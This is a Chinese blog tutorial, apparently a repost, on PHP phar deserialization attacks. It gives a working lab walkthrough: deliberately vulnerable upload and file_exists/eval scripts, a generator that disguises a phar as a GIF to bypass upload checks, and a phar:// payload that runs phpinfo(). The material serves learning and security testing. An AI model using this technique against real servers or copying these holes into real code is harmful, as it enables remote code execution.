2021-06-12web渗透学习之phar反序列化

最新推荐文章于 2023-08-21 20:48:32 发布
最新推荐文章于 2023-08-21 20:48:32 发布
阅读量234 收藏
点赞数
分类专栏: 各种靶场 WEB渗透学习
原文链接:https://xz.aliyun.com/t/2715
版权

概要

来自Secarma的安全研究员Sam Thomas发现了一种新的漏洞利用方式,可以在不使用php函数unserialize()的前提下,引起严重的php对象注入漏洞。
这个新的攻击方式被他公开在了美国的BlackHat会议演讲上,演讲主题为:”不为人所知的php反序列化漏洞”。它可以使攻击者将相关漏洞的严重程度升级为远程代码执行。我们在RIPS代码分析引擎中添加了对这种新型攻击的检测。

关于流包装

大多数PHP文件操作允许使用各种URL协议去访问文件路径:如data://zlib://php://
例如常见的

include('php://filter/read=convert.base64-encode/resource=index.php');
include('data://text/plain;base64,xxxxxxxxxxxx');

phar://也是流包装的一种

phar原理

a stub

可以理解为一个标志,格式为xxx<?php xxx;__HALT_COMPILER();?>,前面内容不限,但必须以__HALT_COMPILER();?>来结尾,否则phar扩展将无法识别这个文件为phar文件。

官方手册

phar的本质是一种压缩文件,其中每个被压缩文件的权限、属性等信息都放在这部分。这部分还会以序列化的形式存储用户自定义的meta-data,这是上述攻击手法最核心的地方。

demo

根据文件结构我们来自己构建一个phar文件,php内置了一个Phar类来处理相关操作

注意:要将php.ini中的phar.readonly选项设置为Off,否则无法生成phar文件。

phar.php:

<?php
    class TestObject {
    }
    $phar = new Phar("phar.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
    $o = new TestObject();
    $o -> data='hu3sky';
    $phar->setMetadata($o); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();
?>

访问后,会生成一个phar.phar在当前目录下。

用winhex打开

可以明显的看到meta-data是以序列化的形式存储的。
有序列化数据必然会有反序列化操作,php一大部分的文件系统函数在通过phar://伪协议解析phar文件时,都会将meta-data进行反序列化,测试后受影响的函数如下:

phar_fan.php

<?php
class TestObject{
    function __destruct()
    {
        echo $this -> data;   // TODO: Implement __destruct() method.
    }
}
include('phar://phar.phar');
?>

输出

将phar伪造成其他格式的文件

在前面分析phar的文件结构时可能会注意到,php识别phar文件是通过其文件头的stub,更确切一点来说是__HALT_COMPILER();?>这段代码,对前面的内容或者后缀名是没有要求的。那么我们就可以通过添加任意的文件头+修改后缀名的方式将phar文件伪装成其他格式的文件。

<?php
    class TestObject {

    }
    $phar = new Phar('phar.phar');
    $phar -> startBuffering();
    $phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');   //设置stub,增加gif文件头
    $phar ->addFromString('test.txt','test');  //添加要压缩的文件
    $object = new TestObject();
    $object -> data = 'hu3sky';
    $phar -> setMetadata($object);  //将自定义meta-data存入manifest
    $phar -> stopBuffering();
?>

采用这种方法可以绕过很大一部分上传检测。

利用条件

phar文件要能够上传到服务器端。

file_exists()fopen()file_get_contents()file()等文件操作的函数

要有可用的魔术方法作为“跳板”。

文件操作函数的参数可控,且:/phar等特殊字符没有被过滤。

漏洞验证

环境准备

upload_file.php,后端检测文件上传,文件类型是否为gif,文件后缀名是否为gif
upload_file.html 文件上传表单
file_un.php 存在file_exists(),并且存在__destruct()

文件内容

upload_file.php

<?php
if (($_FILES["file"]["type"]=="image/gif")&&(substr($_FILES["file"]["name"], strrpos($_FILES["file"]["name"], '.')+1))== 'gif') {
    echo "Upload: " . $_FILES["file"]["name"];
    echo "Type: " . $_FILES["file"]["type"];
    echo "Temp file: " . $_FILES["file"]["tmp_name"];

    if (file_exists("upload_file/" . $_FILES["file"]["name"]))
      {
      echo $_FILES["file"]["name"] . " already exists. ";
      }
    else
      {
      move_uploaded_file($_FILES["file"]["tmp_name"],
      "upload_file/" .$_FILES["file"]["name"]);
      echo "Stored in: " . "upload_file/" . $_FILES["file"]["name"];
      }
    }
else
  {
  echo "Invalid file,you can only upload gif";
  }

upload_file.html

<body>
<form action="http://localhost/upload_file.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file" />
    <input type="submit" name="Upload" />
</form>
</body>

file_un.php

<?php
$filename=$_GET['filename'];
class AnyClass{
    var $output = 'echo "ok";';
    function __destruct()
    {
        eval($this -> output);
    }
}
file_exists($filename);

实现过程

首先是根据file_un.php写一个生成phar的php文件,当然需要绕过gif,所以需要加GIF89a,然后我们访问这个php文件后,生成了phar.phar,修改后缀为gif,上传到服务器,然后利用file_exists,使用phar://执行代码

构造代码

eval.php

<?php
class AnyClass{
    var $output = 'echo "ok";';
    function __destruct()
    {
        eval($this -> output);
    }
}
$phar = new Phar('phar.phar');
$phar -> stopBuffering();
$phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');
$phar -> addFromString('test.txt','test');
$object = new AnyClass();
$object -> output= 'phpinfo();';
$phar -> setMetadata($object);
$phar -> stopBuffering();

访问eval.php,会在当前目录生成phar.phar,然后修改后缀 gif

接着上传,文件会上传到upload_file目录下

然后利用file_un.php。
payload:filename=phar://upload_file/phar.gif

参考文章

https://paper.seebug.org/680/ 【利用 phar 拓展 php 反序列化漏洞攻击面】
https://blog.ripstech.com/2018/new-php-exploitation-technique/

热热的雨夜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【愚公系列】2023年05月 Web渗透测试之反序列化攻击
时光隧道
08-25 5万+
PHP反序列化漏洞是一种常见的Web攻击方式,主要是指攻击者利用PHP反序列化函数中的漏洞,来执行恶意代码或获取系统敏感信息的行为。攻击者通常会将恶意序列化数据发送给Web应用程序,由Web应用程序进行反序列化操作,从而导致恶意代码的执行或敏感资源泄露。该漏洞主要出现在PHP反序列化函数unserialize()中,当程序接收到用户传递的未经过校验的序列化数据时,就很容易受到攻击。攻击者通过构造特定的序列化数据,可以在反序列化过程中执行系统命令、读取文件等危险操作,从而导致安全漏洞。
web渗透测试----20、反序列化漏洞--(1)序列化和反序列化
七天
03-09 2002
序列化与反序列化
『PHP』phar文件详解_phar文件格式_调用phar类方法生成phar文件
Ho1aAs‘s Blog
09-04 7605
phar简介 phar,全称为PHP Archive,phar扩展提供了一种将整个PHP应用程序放入.phar文件中的方法,以方便移动、安装。.phar文件的最大特点是将几个文件组合成一个文件的便捷方式,.phar文件提供了一种将完整的PHP程序分布在一个文件中并从该文件中运行的方法。 可以将phar文件类比为一个压缩文件 phar demo 注意:默认phar扩展是只读模式,需要手动配置php.ini中phar.readonly= Off 无法用ini_set修改 『踩坑记录』PHP-使用ini_set
web渗透工程师——初级面试总结
m0_61506558的博客
10-12 2534
根据sql注入各自的特点可以分为联合注入、二次注入、宽字节注入、堆叠注入等,根据http报文中的不同位置可以有cookie注入、referer注入、x-forwarded-for注入等。产生sql注入漏洞主要因为没有对接受到的参数进行过滤、验证和处理直接拼接到了sql语句中,然后直接执行该sql语句,这样就会导致恶意用户传入一些精心构造的sql代码,与后台sql语句拼接后形成完整的sql语句执行,达到攻击者的目的。大小写绕过 、编码绕过、注释绕过、关键字/关键函数替换、参数污染、缓存区溢出、特殊符号。
web渗透之——PHP反序列化漏洞
wsnbbz的博客
03-04 888
漏洞原理 PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。 漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。反序列化漏洞并不是PHP特有,也存在于Java、Python等语言之中,但其原理基本相通 漏洞形成 将用...
利用PHAR协议进行PHP反序列化攻击1
08-03
乎所有件操作函数都可触发 phar 反序列化题地址:[CISCN2019 华北赛区 Day1 Web1]Dropbox(链接:进题后,随意注册账号上传件,上传点
CVE-2021-3129:Laravel调试RCE
05-26
CVE-2021-3129 Laravel debug rce 食用方法 执行docker-compse up -d启动环境 访问8888端口后点击首页面的generate key就可以复现了 关于docker环境想说的几点: 把.env.example复制到.env作用是开启debug环境 关闭...
php-cs-fixer.phar
05-30
php-cs-fixer v2.16.3,来源 https://github.com/friendsofphp/php-cs-fixer
laravel-exploits:针对CVE-2021-3129的漏洞利用
05-25
laravel漏洞 漏洞利用CVE-2021-3129详细信息: ://www.ambionics.io/blog/laravel-debug-rce 用法 $ php -d ' phar.readonly=0 ' ./phpggc --phar ...Successfully converted to PHAR ! Phar deserialized -----------
PharTools:一个强大PHP-CLI工具,用于管理phar(PHP-Archive)文件
05-26
Phar工具 PharTools是功能强大PHP命令行工具,用于管理phar(PHP存档)文件。 它允许创建,提取,编辑和查看phar档案。 它还包括一个简单的API,可在您自己的脚本上实现PharTools功能。 特征: 创建Phar档案 提取...
phar反序列化小结
Lethe's Blog
11-13 2941
0x00 phar反序列化 phar反序列化即在文件系统函数(file_exists()、is_dir()等)参数可控的情况下,配合phar://伪协议,可以不依赖unserialize()直接进行反序列化操作。 关于其他反序列化的总结,可以看我的这篇文章 0x01 原理 首先了解一下phar文件的结构,一个phar文件由四部分构成: a stub:可以理解为一个标志,格式为xxx<...
ThinkPHPV5.1.25中使用file_exists等函数没有触发phar://的反序列化的destruct魔术方法执行的问题
听香水榭
08-21 297
因为像我碰到的问题就是我的项目主目录下的/runtime目录没有Web服务器用户的写入权限会导致日志写入失败报错:think\exception\ErrorException: mkdir(): 权限不够。导致后续代码不会执行,因此反序列化生成的对象就无法调用destruct魔术方法,当把吸入权限补上之后就OK了。在thinkphp框架中目标对象的wakeup魔术方法是会执行的,但是destruct魔术方法不一定会。
python学习笔记20190619——eval语句应用
sinat_33147507的博客
06-20 312
今天完成了MOOC的python课程的第一周编程作业。 本周编程作业有两道题目,第一道是Hello World的条件输出。 在这题目里面,需要注意在用input读入整数后,用eval函数将字符串转为整数类型才做判断,否则会出错。其次,貌似后两种输出方式应该都有更加简便的语句来实现,但这里还是用最stupid的办法来做。 个人解答如下 flag = input() flag = eval(flag...
phar的认识与使用
Leroi_Liu的博客
01-11 7615
对于Web应用的开发,如果你没用使用正确的工具,那开发过程可能会变得困难和痛苦。如果你之前开发过Java程序,我相信你肯定知道Jar文件(Jar是Java ARchive的缩写)。一个应用,包括所有的可执行、可访问的文件,都打包进了一个JAR文件里,使得部署过程十分简单。 PHAR (“Php ARchive”) 是PHP里类似于JAR的一种打包文件。如果你使用的是 PHP 5.3 或更高版本,...
关于php----phar伪协议和phar文件反序列化漏洞利用
m0_62107966的博客
09-12 1973
关于php----phar伪协议和phar文件反序列化漏洞利用phar(php archive)含义为php 归档文件。如果一个由多个文件构成的php应用程序,可以合并打包为一个文件夹,类似于javaweb项目里的jar文件的话,对于程序员来说是很方便的。在PHP5.3之后支持了类似Java的jar包,名为phar。用来将多个PHP文件打包为一个文件。要生成phar文件的话也是很方便,不需要借助额外的工具来创建或者使用,通过php脚本运行就自动在该脚本所在目录下自动创建。
web渗透--反序列化远程漏洞利用
朝阳似锦 晖映山河
09-10 315
java rmi介绍 JAVA RMI指的是远程方法调用(Remote Method Lovncation),是一种机制,可以让一个JAVA虚拟机上的对象去调用另外一个JAVA虚拟机上的对象的一种方法。RMI是J2SE的一部分,能够让程序员开发出基于Java的分布式应用,一个RMI对象是一个JAVA远程对象,可以从另一个JAVA虚拟机(或跨越网络)调用他的方法,可以像调用本地的JAVA对象一样调用远程JAVA对象。使分布在不同的JVM中的对象外表和行为都像本地对象一样,对于任何一个以对象为参数的RMI接口
一个phar://的漏洞
Xi4or0uji
10-17 5757
前段时间打了个护网杯,题目质量是真的高,肉鸡又菜了一整场,遇到了一个不太会的东西,复现了一波,记录下好吧。 这个鬼东西就是phar://的序列化的漏洞 介绍一下 phar://跟php://filter 、data://那些一样,都是流包装,可以将一组php文件进行打包,可以创建默认执行的stub stub 就是一个标志,格式xxx&lt;?php xxxxx; __HALT_COMPIL...
php归档格式:phar文件详解(创建、使用、解包还原提取)
热门推荐
云客的技术博客【云游天下 做客四方】
02-10 1万+
一个php应用程序往往是由多个文件构成的,如果能把他们集中为一个文件来分发和运行是很方便的,这样的列子有很多,比如在window操作系统上面的安装程序、一个jquery库等等,为了做到这点php采用了phar文档文件格式,这个概念源自java的jar,但是在设计时主要针对 PHP 的 Web 环境,与 JAR 归档不同的是Phar 归档可由 PHP 本身处理,因此不需要使用额外的工具来创建或使用,
PHP反序列化入门之phar
weixin_44304686的博客
06-12 525
原文链接:https://mochazz.github.io/2019/02/02/PHP反序列化入门之phar/ phar介绍 简单来说phar就是php压缩文档。它可以把多个文件归档到同一个文件中,而且不经过解压就能被 php 访问并执行,与file:// php://等类似,也是一种流包装器。 phar结构由 4 部分组成 stub phar 文件标识,格式为 xxx<?php x...
phar反序列化poc
最新发布
05-21
攻击者可以通过构造特定的Phar文件,触发解析器反序列化恶意代码,从而实现远程代码执行。 一个简单的Phar反序列化POC如下: ``` class Example { public $command; } $phar = new Phar('phar.phar'); $phar->...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值